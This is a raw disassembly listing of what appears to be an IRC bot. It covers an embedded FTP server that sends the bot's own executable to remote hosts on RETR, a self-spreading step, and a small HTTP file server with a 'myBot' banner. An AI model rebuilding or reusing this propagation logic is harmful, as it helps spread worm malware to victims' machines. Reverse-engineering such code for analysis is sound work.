lea eax, [ebp+Str1]
push offset off_43492C ; Str2
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F6B3
push esi
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
loc_40F6AD: ; CODE XREF: sub_40F3AA+27C�j
; sub_40F3AA+2A0�j ...
push edi
jmp loc_40F98C
; ---------------------------------------------------------------------------
loc_40F6B3: ; CODE XREF: sub_40F3AA+2F9�j
mov edi, offset aType ; "TYPE"
lea eax, [ebp+Str1]
push edi ; Str2
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F6EF
lea eax, [ebp+var_338]
push offset aA_0 ; "A"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F6EF
push esi
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_40F989
; ---------------------------------------------------------------------------
loc_40F6EF: ; CODE XREF: sub_40F3AA+31F�j
; sub_40F3AA+336�j
lea eax, [ebp+Str1]
push edi ; Str2
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F726
lea eax, [ebp+var_338]
push offset aI_0 ; "I"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F726
push esi
push 13h
push offset a200TypeSetToI_ ; "200 Type set to I.\n"
jmp loc_40F989
; ---------------------------------------------------------------------------
loc_40F726: ; CODE XREF: sub_40F3AA+356�j
; sub_40F3AA+36D�j
lea eax, [ebp+Str1]
push offset aPasv ; "PASV"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F771
push 0Ah
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
pop ecx
lea edi, [ebp+Str]
rep movsd
push eax
lea eax, [ebp+Str]
push eax ; Str
movsw
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
loc_40F764: ; CODE XREF: sub_40F3AA+406�j
push eax
push [ebp+arg_0]
call ebx ; send
xor esi, esi
jmp loc_40F98E
; ---------------------------------------------------------------------------
loc_40F771: ; CODE XREF: sub_40F3AA+391�j
lea eax, [ebp+Str1]
push offset aList_0 ; "LIST"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F7B2
push 5
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
pop ecx
lea edi, [ebp+var_C8]
rep movsd
movsw
push eax
lea eax, [ebp+var_C8]
push eax ; Str
movsb
call _strlen
pop ecx
push eax
lea eax, [ebp+var_C8]
jmp short loc_40F764
; ---------------------------------------------------------------------------
loc_40F7B2: ; CODE XREF: sub_40F3AA+3DC�j
lea eax, [ebp+Str1]
push offset aPort ; "PORT"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40F883
lea eax, [ebp+var_2D4]
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+Dst]
push offset aS_1 ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax ; Src
call _sscanf
lea eax, [ebp+Dest]
push eax ; Str
call _atoi
mov edi, eax
lea eax, [ebp+var_2D4]
push eax ; Str
call _atoi
mov [ebp+var_C], eax
push 32h ; Size
lea eax, [ebp+Dest]
push esi ; Val
push eax ; Dst
call _memset
add esp, 34h
lea eax, [ebp+Dest]
push [ebp+var_C]
push edi
push offset aXX ; "%x%x\n"
push eax ; Dest
call _sprintf
push 10h ; Radix
lea eax, [ebp+Dest]
push esi ; EndPtr
push eax ; Str
call _strtoul
add esp, 1Ch
mov [ebp+var_C], eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_4C]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax ; Dest
call _sprintf
add esp, 18h
push esi
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
jmp loc_40F989
; ---------------------------------------------------------------------------
loc_40F883: ; CODE XREF: sub_40F3AA+41D�j
lea eax, [ebp+Str1]
push offset aRetr ; "RETR"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40F96A
push esi
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push [ebp+arg_0]
call ebx ; send
push [ebp+var_C]
lea eax, [ebp+var_4C]
push eax
call sub_40F9BF
pop ecx
cmp eax, 1
pop ecx
jnz loc_40F960
cmp [ebp+var_444], esi
jnz short loc_40F8ED
push esi ; int
lea eax, [ebp+var_8E0]
push [ebp+var_448] ; int
push eax ; int
lea eax, [ebp+var_4C8]
push eax ; Str
push [ebp+var_6E0] ; int
call sub_409869
add esp, 14h
loc_40F8ED: ; CODE XREF: sub_40F3AA+51E�j
call sub_40FA3C
cmp eax, 1
jnz loc_40F98E
push esi
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
push [ebp+arg_0]
call ebx ; send
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_8E0]
push offset dword_434798 ; Format
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_444], esi
jnz short loc_40F94B
push esi ; int
lea eax, [ebp+var_8E0]
push [ebp+var_448] ; int
push eax ; int
lea eax, [ebp+var_4C8]
push eax ; Str
push [ebp+var_6E0] ; int
call sub_409869
add esp, 14h
loc_40F94B: ; CODE XREF: sub_40F3AA+57C�j
lea eax, [ebp+var_8E0]
push eax
call sub_415D38
inc dword_4CE4E0
pop ecx
jmp short loc_40F98E
; ---------------------------------------------------------------------------
loc_40F960: ; CODE XREF: sub_40F3AA+512�j
push esi
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_40F989
; ---------------------------------------------------------------------------
loc_40F96A: ; CODE XREF: sub_40F3AA+4EE�j
lea eax, [ebp+Str1]
push offset aQuit ; "QUIT"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F98E
push esi
push 1Bh
push offset a221GoodbyeHapp ; "221 Goodbye happy r00ting.\n"
loc_40F989: ; CODE XREF: sub_40F3AA+340�j
; sub_40F3AA+377�j ...
push [ebp+arg_0]
loc_40F98C: ; CODE XREF: sub_40F3AA+304�j
call ebx ; send
loc_40F98E: ; CODE XREF: sub_40F3AA+3C2�j
; sub_40F3AA+54B�j ...
push 64h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
mov edi, [ebp+arg_0]
add esp, 0Ch
loc_40F9A3: ; CODE XREF: sub_40F3AA+151�j
; sub_40F3AA+17A�j ...
inc edi
cmp edi, [ebp+var_4]
mov [ebp+arg_0], edi
jle loc_40F4C9
jmp loc_40F48E
; ---------------------------------------------------------------------------
loc_40F9B5: ; CODE XREF: sub_40F3AA+10F�j
push 1
pop eax
loc_40F9B8: ; CODE XREF: sub_40F3AA+C1�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_40F3AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F9BF proc near ; CODE XREF: sub_40F3AA+508�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push eax
push 101h
call ds:dword_4271D8 ; WSAStartup
push 0
push 1
push 2
call ds:dword_427204 ; socket
push [ebp+arg_0]
mov dword_4CE71C, eax
mov [ebp+var_10], 2
call ds:dword_4271F0 ; inet_addr
push [ebp+arg_4]
mov [ebp+var_C], eax
call ds:dword_4271F4 ; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_10]
push 10h
push eax
push dword_4CE71C
call ds:dword_4271F8 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40FA37
push dword_4CE71C
call ds:dword_427200 ; closesocket
call ds:dword_4271D4 ; WSACleanup
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40FA37: ; CODE XREF: sub_40F9BF+60�j
push 1
pop eax
leave
retn
sub_40F9BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FA3C proc near ; CODE XREF: sub_40F3AA:loc_40F8ED�p
DstBuf = byte ptr -504h
Filename = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 504h
push esi
lea eax, [ebp+Filename]
push 104h
push eax
push 0
call ds:dword_427078 ; GetModuleFileNameA
lea eax, [ebp+Filename]
push offset aRb ; "rb"
push eax ; Filename
call _fopen
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_40FAD3
test byte ptr [esi+0Ch], 10h
jnz short loc_40FAB7
push edi
mov edi, 400h
loc_40FA7F: ; CODE XREF: sub_40FA3C+78�j
push esi ; File
push 1 ; Count
lea eax, [ebp+DstBuf]
push edi ; ElementSize
push eax ; DstBuf
call _fread
add esp, 10h
lea eax, [ebp+DstBuf]
push 0
push edi
push eax
push dword_4CE71C
call ds:dword_427208 ; send
push 1
call ds:dword_427080 ; Sleep
test byte ptr [esi+0Ch], 10h
jz short loc_40FA7F
pop edi
loc_40FAB7: ; CODE XREF: sub_40FA3C+3B�j
push esi ; File
call _fclose
pop ecx
push dword_4CE71C
call ds:dword_427200 ; closesocket
call ds:dword_4271D4 ; WSACleanup
push 1
pop eax
loc_40FAD3: ; CODE XREF: sub_40FA3C+35�j
pop esi
leave
retn
sub_40FA3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FAD6 proc near ; DATA XREF: sub_401ACD+2229�o
; sub_40BD91+475�o
Str = byte ptr -28F0h
Str1 = byte ptr -18F0h
Dest = byte ptr -8F0h
var_6F0 = byte ptr -6F0h
var_5EC = dword ptr -5ECh
var_5E8 = byte ptr -5E8h
var_360 = byte ptr -360h
var_25C = dword ptr -25Ch
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_23C = byte ptr -23Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_34 = byte ptr -34h
Dst = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28F0h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_5EC]
push 1
rep movsd
pop esi
xor ebx, ebx
mov [eax+3ACh], esi
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_14], esi
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_25C]
call dword_4CB9D4 ; htons
push ebx
push esi
push 2
mov [ebp+var_22], ax
mov [ebp+var_20], ebx
call dword_4CBA54 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_C], edi
jz loc_40FEC1
mov eax, [ebp+var_254]
push 10h
imul eax, 234h
mov dword_43E91C[eax], edi
lea eax, [ebp+Dst]
push eax
push edi
call dword_4CBA00 ; bind
cmp eax, 0FFFFFFFFh
jz loc_40FEC1
push 7FFFFFFFh
push edi
call dword_4CB9FC ; listen
cmp eax, 0FFFFFFFFh
jz loc_40FEC1
lea eax, [ebp+var_14]
push eax
push 8004667Eh
push edi
call dword_4CBA70 ; ioctlsocket
cmp eax, 0FFFFFFFFh
jz loc_40FEC1
mov ebx, esi
mov [ebp+var_134], edi
mov [ebp+var_138], ebx
mov [ebp+var_8], edi
loc_40FBAD: ; CODE XREF: sub_40FAD6+3E1�j
push 41h
xor eax, eax
pop ecx
lea esi, [ebp+var_138]
push eax
push eax
push eax
lea eax, [ebp+var_6F0]
push eax
mov eax, [ebp+var_8]
lea edi, [ebp+var_6F0]
inc eax
rep movsd
push eax
call dword_4CB9BC ; select
cmp eax, 0FFFFFFFFh
jz loc_40FEBC
xor esi, esi
mov [ebp+var_4], esi
loc_40FBE3: ; CODE XREF: sub_40FAD6+3DB�j
lea eax, [ebp+var_6F0]
push eax
push esi
call dword_4CB8C0 ; __WSAFDIsSet
test eax, eax
jz loc_40FEA7
cmp esi, [ebp+var_C]
jnz short loc_40FC65
lea eax, [ebp+var_10]
mov [ebp+var_10], 10h
push eax
lea eax, [ebp+var_34]
push eax
push [ebp+var_C]
call dword_4CBA68 ; accept
cmp eax, 0FFFFFFFFh
jz loc_40FEA7
xor ecx, ecx
test ebx, ebx
jbe short loc_40FC37
lea edx, [ebp+var_134]
loc_40FC2B: ; CODE XREF: sub_40FAD6+15F�j
cmp [edx], eax
jz short loc_40FC37
inc ecx
add edx, 4
cmp ecx, ebx
jb short loc_40FC2B
loc_40FC37: ; CODE XREF: sub_40FAD6+14D�j
; sub_40FAD6+157�j
cmp ecx, ebx
jnz short loc_40FC54
cmp ebx, 40h
jnb short loc_40FC54
mov [ebp+ecx*4+var_134], eax
mov ebx, [ebp+var_138]
inc ebx
mov [ebp+var_138], ebx
loc_40FC54: ; CODE XREF: sub_40FAD6+163�j
; sub_40FAD6+168�j
cmp eax, [ebp+var_8]
jbe loc_40FEA7
mov [ebp+var_8], eax
jmp loc_40FEA7
; ---------------------------------------------------------------------------
loc_40FC65: ; CODE XREF: sub_40FAD6+126�j
mov edi, 1000h
lea eax, [ebp+Str]
push edi ; Size
push 0 ; Val
push eax ; Dst
call _memset
push edi ; Size
lea eax, [ebp+Str1]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 18h
lea eax, [ebp+Str]
push 0
push edi
push eax
push esi
call dword_4CB9EC ; recv
test eax, eax
jg short loc_40FCF8
push esi
call dword_4CBA6C ; closesocket
xor ecx, ecx
test ebx, ebx
jbe loc_40FEA7
lea eax, [ebp+var_134]
loc_40FCB7: ; CODE XREF: sub_40FAD6+1EB�j
cmp [eax], esi
jz short loc_40FCC8
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_40FCB7
jmp loc_40FEA7
; ---------------------------------------------------------------------------
loc_40FCC8: ; CODE XREF: sub_40FAD6+1E3�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_40FCEC
lea eax, [ebp+ecx*4+var_134]
loc_40FCD6: ; CODE XREF: sub_40FAD6+214�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_40FCD6
loc_40FCEC: ; CODE XREF: sub_40FAD6+1F7�j
dec ebx
mov [ebp+var_138], ebx
jmp loc_40FEA7
; ---------------------------------------------------------------------------
loc_40FCF8: ; CODE XREF: sub_40FAD6+1C8�j
xor esi, esi
push 104h ; Size
lea eax, [ebp+var_23C]
push esi ; Val
push eax ; Dst
call _memset
lea eax, [ebp+Str]
mov [ebp+arg_0], esi
push eax ; Str
call _strlen
add esp, 10h
test eax, eax
jbe loc_40FEA7
loc_40FD26: ; CODE XREF: sub_40FAD6+309�j
mov eax, [ebp+arg_0]
mov al, [ebp+eax+Str]
cmp al, 0Ah
mov [ebp+esi+Str1], al
jnz loc_40FDCB
mov esi, offset aGet_0 ; "GET "
lea eax, [ebp+Str1]
push esi ; SubStr
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_40FD9F
lea eax, [ebp+Str1]
push eax ; Str
call _strlen
cmp eax, 5
pop ecx
jbe short loc_40FD9F
mov eax, offset asc_42CDC0 ; " "
push eax ; Delim
push eax ; SubStr
lea eax, [ebp+Str1]
push esi ; SubStr
push eax ; Str
call _strstr
pop ecx
pop ecx
push eax ; Str
call _strstr
pop ecx
pop ecx
push eax ; Str
call _strtok
push eax ; Source
lea eax, [ebp+var_23C]
push eax ; Dest
call _strcpy
add esp, 10h
jmp short loc_40FDB6
; ---------------------------------------------------------------------------
loc_40FD9F: ; CODE XREF: sub_40FAD6+27F�j
; sub_40FAD6+291�j
lea eax, [ebp+Str1]
push offset asc_4349EC ; "\r\n"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40FDEA
loc_40FDB6: ; CODE XREF: sub_40FAD6+2C7�j
push edi ; Size
lea eax, [ebp+Str1]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
or esi, 0FFFFFFFFh
loc_40FDCB: ; CODE XREF: sub_40FAD6+263�j
inc [ebp+arg_0]
lea eax, [ebp+Str]
push eax ; Str
inc esi
call _strlen
cmp [ebp+arg_0], eax
pop ecx
jb loc_40FD26
jmp loc_40FEA7
; ---------------------------------------------------------------------------
loc_40FDEA: ; CODE XREF: sub_40FAD6+2DE�j
xor ecx, ecx
test ebx, ebx
jbe short loc_40FE34
lea eax, [ebp+var_134]
loc_40FDF6: ; CODE XREF: sub_40FAD6+32D�j
mov esi, [ebp+var_4]
cmp [eax], esi
jz short loc_40FE07
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_40FDF6
jmp short loc_40FE37
; ---------------------------------------------------------------------------
loc_40FE07: ; CODE XREF: sub_40FAD6+325�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_40FE2B
lea eax, [ebp+ecx*4+var_134]
loc_40FE15: ; CODE XREF: sub_40FAD6+353�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_40FE15
loc_40FE2B: ; CODE XREF: sub_40FAD6+336�j
dec ebx
mov [ebp+var_138], ebx
jmp short loc_40FE37
; ---------------------------------------------------------------------------
loc_40FE34: ; CODE XREF: sub_40FAD6+318�j
mov esi, [ebp+var_4]
loc_40FE37: ; CODE XREF: sub_40FAD6+32F�j
; sub_40FAD6+35C�j
lea eax, [ebp+var_23C]
test eax, eax
jz short loc_40FEA0
lea eax, [ebp+var_360]
push eax ; Str
call _strlen
mov edi, eax
lea eax, [ebp+var_23C]
push eax ; Str
call _strlen
add edi, eax
pop ecx
cmp edi, 104h
pop ecx
jnb short loc_40FEA0
and [ebp+arg_0], 0
lea eax, [ebp+arg_0]
push eax
push 8004667Eh
push esi
call dword_4CBA70 ; ioctlsocket
push [ebp+var_254]
lea eax, [ebp+var_23C]
push [ebp+var_248]
push eax
lea eax, [ebp+var_360]
push eax
push esi
call sub_4100B4
add esp, 14h
jmp short loc_40FEA7
; ---------------------------------------------------------------------------
loc_40FEA0: ; CODE XREF: sub_40FAD6+369�j
; sub_40FAD6+38F�j
push esi
call dword_4CBA6C ; closesocket
loc_40FEA7: ; CODE XREF: sub_40FAD6+11D�j
; sub_40FAD6+143�j ...
mov esi, [ebp+var_4]
inc esi
cmp esi, [ebp+var_8]
mov [ebp+var_4], esi
jbe loc_40FBE3
jmp loc_40FBAD
; ---------------------------------------------------------------------------
loc_40FEBC: ; CODE XREF: sub_40FAD6+102�j
mov edi, [ebp+var_C]
xor ebx, ebx
loc_40FEC1: ; CODE XREF: sub_40FAD6+6A�j
; sub_40FAD6+92�j ...
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_4349C4 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_24C], ebx
jnz short loc_40FF07
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_250] ; int
push eax ; int
lea eax, [ebp+var_5E8]
push eax ; Str
push [ebp+var_5EC] ; int
call sub_409869
add esp, 14h
loc_40FF07: ; CODE XREF: sub_40FAD6+40C�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
pop ecx
push edi
call dword_4CBA6C ; closesocket
push [ebp+var_254]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
pop ebx
sub_40FAD6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FF31 proc near ; DATA XREF: sub_4100B4+24D�o
Str = byte ptr -1654h
Source = byte ptr -654h
Dest = byte ptr -550h
var_44C = dword ptr -44Ch
Format = byte ptr -3C8h
var_2C4 = byte ptr -2C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
var_68 = byte ptr -68h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1654h
call __alloca_probe
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_44C]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp+Format]
push eax ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+var_2C4]
pop ecx
push eax ; Format
lea eax, [ebp+Source]
push eax ; Dest
call _sprintf
xor edi, edi
pop ecx
cmp [ebp+var_A4], edi
pop ecx
jz short loc_40FF97
push offset aTextHtml ; "text/html"
jmp short loc_40FF9C
; ---------------------------------------------------------------------------
loc_40FF97: ; CODE XREF: sub_40FF31+5D�j
push offset aApplicationOct ; "application/octet-stream"
loc_40FF9C: ; CODE XREF: sub_40FF31+64�j
lea eax, [ebp+var_9C]
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+var_68]
pop ecx
mov esi, 409h
push 46h
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push edi
push edi
push esi
call ds:dword_427110 ; GetDateFormatA
lea eax, [ebp+var_20]
push 1Eh
push eax
push offset aHhMmSs ; "HH:mm:ss"
push edi
push edi
push esi
call ds:dword_42710C ; GetTimeFormatA
lea eax, [ebp+var_20]
cmp [ebp+var_B8], 0FFFFFFFFh
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
jnz short loc_410015
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+Str]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax ; Dest
call _sprintf
add esp, 24h
jmp short loc_410036
; ---------------------------------------------------------------------------
loc_410015: ; CODE XREF: sub_40FF31+C5�j
push [ebp+var_B8]
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+Str]
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax ; Dest
call _sprintf
add esp, 28h
loc_410036: ; CODE XREF: sub_40FF31+E2�j
lea eax, [ebp+Str]
push edi
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+var_44C]
call dword_4CBA24 ; send
cmp [ebp+var_A4], edi
jnz short loc_410076
lea eax, [ebp+Dest]
push eax
push [ebp+var_44C]
call sub_4109F1
pop ecx
pop ecx
jmp short loc_410093
; ---------------------------------------------------------------------------
loc_410076: ; CODE XREF: sub_40FF31+12D�j
lea eax, [ebp+Source]
push eax ; Source
push edi ; int
push [ebp+var_44C] ; int
lea eax, [ebp+Dest]
push eax ; Str
call sub_41036B
add esp, 10h
loc_410093: ; CODE XREF: sub_40FF31+143�j
push [ebp+var_44C]
call dword_4CBA6C ; closesocket
push [ebp+var_B4]
call sub_40B6D6
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_40FF31 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4100B4 proc near ; CODE XREF: sub_40FAD6+3C0�p
Source = byte ptr -8C4h
var_6C4 = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
Str = byte ptr -314h
var_211 = byte ptr -211h
Dst = byte ptr -210h
Dest = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
xor edi, edi
push 104h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
mov [ebp+var_4], edi
call _memset
mov eax, [ebp+arg_8]
add esp, 0Ch
cmp byte ptr [eax], 2Fh
jz short loc_4100EA
push eax
push offset aS_9 ; "\\%s"
jmp short loc_4100F3
; ---------------------------------------------------------------------------
loc_4100EA: ; CODE XREF: sub_4100B4+2C�j
push eax
mov byte ptr [eax], 5Ch
push offset aS_6 ; "%s"
loc_4100F3: ; CODE XREF: sub_4100B4+34�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+Dest]
xor esi, esi
xor ebx, ebx
push eax ; Str
call _strlen
test eax, eax
pop ecx
jbe short loc_41018E
mov [ebp+arg_8], 2
loc_41011E: ; CODE XREF: sub_4100B4+D8�j
lea eax, [ebp+Dest]
push eax ; Str
call _strlen
cmp [ebp+arg_8], eax
pop ecx
jnb short loc_41015E
cmp [ebp+esi+Dest], 25h
jnz short loc_41015E
cmp [ebp+esi+var_10B], 32h
jnz short loc_41015E
cmp [ebp+esi+var_10A], 30h
jnz short loc_41015E
inc esi
mov [ebp+ebx+Dst], 20h
inc esi
add [ebp+arg_8], 2
jmp short loc_410178
; ---------------------------------------------------------------------------
loc_41015E: ; CODE XREF: sub_4100B4+7A�j
; sub_4100B4+84�j ...
mov al, [ebp+esi+Dest]
cmp al, 2Fh
jnz short loc_41016E
push 5Ch
pop eax
jmp short loc_410171
; ---------------------------------------------------------------------------
loc_41016E: ; CODE XREF: sub_4100B4+B3�j
movsx eax, al
loc_410171: ; CODE XREF: sub_4100B4+B8�j
mov [ebp+ebx+Dst], al
loc_410178: ; CODE XREF: sub_4100B4+A8�j
lea eax, [ebp+Dest]
inc esi
inc [ebp+arg_8]
push eax ; Str
inc ebx
call _strlen
cmp esi, eax
pop ecx
jb short loc_41011E
loc_41018E: ; CODE XREF: sub_4100B4+61�j
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+Str]
push [ebp+arg_4]
push offset aSS ; "%s%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Str]
push offset asc_42A080 ; "\n"
push eax ; Str
call _strtok
add esp, 18h
lea eax, [ebp+Str]
push eax
call ds:dword_4270A0 ; GetFileAttributesA
push 1
cmp eax, 10h
pop esi
jz short loc_4101DF
cmp eax, 0FFFFFFFFh
jnz short loc_4101E2
push [ebp+arg_0]
jmp loc_410262
; ---------------------------------------------------------------------------
loc_4101DF: ; CODE XREF: sub_4100B4+11C�j
mov [ebp+var_4], esi
loc_4101E2: ; CODE XREF: sub_4100B4+121�j
cmp [ebp+ebx+var_211], 5Ch
jnz short loc_4101EF
mov [ebp+var_4], esi
loc_4101EF: ; CODE XREF: sub_4100B4+136�j
mov ebx, [ebp+arg_0]
cmp [ebp+var_4], edi
mov [ebp+var_6C4], ebx
mov [ebp+var_318], edi
jz short loc_41026D
cmp [ebp+arg_C], edi
jz short loc_410261
lea eax, [ebp+Str]
push offset asc_434C78 ; "*"
push eax ; Dest
call _strcat
pop ecx
lea eax, [ebp+Str]
pop ecx
push eax ; Format
lea eax, [ebp+var_640]
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Str
call sub_410AAE
add esp, 0Ch
lea eax, [ebp+Dst]
push eax ; Format
lea eax, [ebp+var_53C]
push eax ; Dest
call _sprintf
or [ebp+var_330], 0FFFFFFFFh
pop ecx
pop ecx
mov [ebp+var_31C], esi
jmp short loc_4102BC
; ---------------------------------------------------------------------------
loc_410261: ; CODE XREF: sub_4100B4+152�j
push ebx
loc_410262: ; CODE XREF: sub_4100B4+126�j
call dword_4CBA6C ; closesocket
jmp loc_410364
; ---------------------------------------------------------------------------
loc_41026D: ; CODE XREF: sub_4100B4+14D�j
push edi
push edi
push 3
push edi
push esi
lea eax, [ebp+Str]
push 80000000h
push eax
call ds:dword_4270F8 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4102BC
lea eax, [ebp+Str]
push eax ; Format
lea eax, [ebp+var_640]
push eax ; Dest
call _sprintf
pop ecx
mov [ebp+var_31C], edi
pop ecx
push edi
push esi
call ds:dword_427114 ; GetFileSize
push esi
mov [ebp+var_330], eax
call ds:dword_427070 ; CloseHandle
loc_4102BC: ; CODE XREF: sub_4100B4+1AB�j
; sub_4100B4+1D6�j
mov esi, [ebp+arg_10]
lea eax, [ebp+Source]
push esi
push offset asc_434C44 ; "-"
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Source]
push 3 ; int
push eax ; Source
call sub_40B3BA
mov [ebp+var_32C], eax
imul eax, 234h
add esp, 18h
mov dword_43E914[eax], esi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_6C4]
push edi
push eax
push offset sub_40FF31
push edi
push edi
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_32C]
imul ecx, 234h
cmp eax, edi
mov dword_43E924[ecx], eax
jz short loc_410336
loc_410324: ; CODE XREF: sub_4100B4+280�j
cmp [ebp+var_318], edi
jnz short loc_410364
push 5
call ds:dword_427080 ; Sleep
jmp short loc_410324
; ---------------------------------------------------------------------------
loc_410336: ; CODE XREF: sub_4100B4+26E�j
push ebx
call dword_4CBA6C ; closesocket
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
